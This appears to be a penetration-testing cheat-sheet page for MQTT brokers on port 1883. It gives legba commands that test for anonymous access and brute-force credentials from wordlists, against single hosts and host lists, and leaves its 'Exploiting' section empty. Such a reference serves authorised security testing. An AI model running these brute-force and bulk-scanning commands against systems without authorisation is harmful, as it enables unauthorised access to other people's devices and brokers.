1883 - MQTT

Potential Risks

Unauthenticated Access

# https://github.com/evilsocket/legba
# RHOST=remoteHost; RPORT=1883
legba mqtt --target $RHOST:$RPORT \
    --username anonymous \
    --password loremIpsumDolorSitAmet

# Bulk testing
# RHOST_LIST=hosts.txt
legba mqtt --target @$RHOST_LIST \
    --username anonymous \
    --password loremIpsumDolorSitAmet \
    --output-format jsonl --output mqtt_unauth.json

Brute Force

# https://github.com/evilsocket/legba
# RHOST=remoteHost; RPORT=1883
# USER_LIST=usernames.txt; PASS_LIST=passwords.txt
legba mqtt --target $RHOST:$RPORT \
    --username $USER_LIST \
    --password $PASS_LIST \
    --output-format jsonl --output mqtt_brute.json

# Bulk testing
# RHOST_LIST=hosts.txt
legba mqtt --target @$RHOST_LIST \
    --username $USER_LIST \
    --password $PASS_LIST \
    --output-format jsonl --output mqtt_brute.json

Exploiting

Information Disclosure

© 2024 Yuuki. Copyright & Made with <3